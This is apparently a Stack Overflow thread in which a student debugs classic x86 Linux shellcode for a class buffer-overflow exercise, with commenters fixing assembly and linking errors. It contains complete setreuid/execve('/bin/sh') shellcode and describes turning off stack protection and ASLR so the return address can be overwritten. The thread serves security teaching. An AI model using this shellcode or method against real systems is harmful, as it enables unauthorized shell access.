# Issue with assembly when trying to spawn shell

Tags: assembly, x86, nasm, buffer-overflow, shellcode

I am working on a buffer overflow in C trying to get a shell to spawn. I have had little to no success in doing this. The closest I have gotten to accomplishing this was a segment fault when I believe it jumped to my shellcode. I tried then to see if the assembly alone works. Every time I run it, I get a `-bash: ./Shellcode: Permission Denied`. I tried running it with `sudo`, but it still does not work. The code came from a site and I tried tweaking it, but my experience with assembly is very limited. What am I doing wrong here? Also, for the buffer overflow, part of what needs to be done is write over the return address with the address of the shellcode (preferably the nops that precede it since that is easier to guess at), correct?

**Additional Info**

So far, I've tried running it on Ubuntu 12.04, 14.04, and Mac OSX Yosemite. I am using `nasm` as the compiler. For the C program, I'm using `gcc`as the compiler with `-fno-stack-protector` and `-z execstack` flags to gain access to the stack. I also turned `ASLR` off on Ubuntu.

**Edit**

I used `nasm -felf -o Shellcode Shellcode.asm`. I tried it without `-o` and let it name the output once and ran `ld -o Shellcode Shellcode.o` as per instructions from the site I followed

**Code**

```
;shellex.asm
[SECTION .text write]

global _start


_start:
        xor eax, eax
        mov al, 70                    ; setreuid is syscall 70
        xor ebx, ebx
        xor ecx, ecx
        int 0x80

        jmp short    mycall           ; Immediately jump to the call instruction

        shellcode:
        pop        ecx                ; Store the address of "/bin/sh" in ESI
        xor        eax, eax           ; Zero out EAX
        mov byte   [ecx + 7], al      ; Write the null byte at the end of the string

        mov dword  [ecx + 8],  esi    ; [ecx+8], i.e. the memory immediately below the string
                                      ;   "/bin/sh", will contain the array pointed to by the
                                      ;   second argument of execve(2); therefore we store in
                                      ;   [ecx+8] the address of the string...
        mov dword  [ecx + 12], eax    ; ...and in [ecx+12] the NULL pointer (EAX is 0)
        mov        al,  0xb           ; Store the number of the syscall (11) in EAX
        lea        ebx, [ecx]         ; Copy the address of the string in EBX
        lea        edx, [ecx + 12]    ; Third argument to execve(2) (NULL pointer)
        lea        ecx, [ecx + 8]     ; Second argument to execve(2)
        int        0x80               ; Execute the system call

        mycall:
        call       shellcode          ; Push the address of "/bin/sh" onto the stack
        db         "/bin/sh"
```

**Edit 2**

here is output of `ld -o Shellcode Shellcode.o`

```
ld: warning: -arch not specified
ld: warning: -macosx_version_min not specified, assuming 10.10
ld: warning: ignoring file Shellcode.o, file was built for unsupported file format ( 0x7F 0x45 0x4C 0x46 0x01 0x01 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 ) which is not the architecture being linked (x86_64): Shellcode.o
Undefined symbols for architecture x86_64:
  "start", referenced from:
     implicit entry/start for main executable
ld: symbol(s) not found for inferred architecture x86_64
```

Comment: You forgot to show the command you use to assemble and link. I am guessing, you forgot to link altogether and tried to run the object file instead of an executable ;)  PS: as for the code, you should name your section something else than `.text` because as it is, it won't be marked writable. `wtext` works fine, for example.

Comment: Yes, `nasm` followed by `ld` is the correct way to get an executable.

Comment: Ok, now I get error with `ld`. I'll update post.

Comment: @Jester. I updated my post with the output of `ld`

Comment: From the error message, you seem to be on a 64 bit mac, and trying to compile a 32 bit linux code. Since you mentioned you have access to ubuntu, try it there. If necessary, use `ld -melf_i386 -o Shellcode Shellcode.o` to force 32 bit mode.

Comment: I get `ld: i386:x86-64 architecture of input file 'Shellcode.o' is incompatible with i386 output`

Comment: Let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/91636/discussion-between-jester-and-czifro).

Comment: @Jester, I just want to thank you. I accomplished a successful buffer overflow and spawned a shell. I am probably the only one in my class to do it.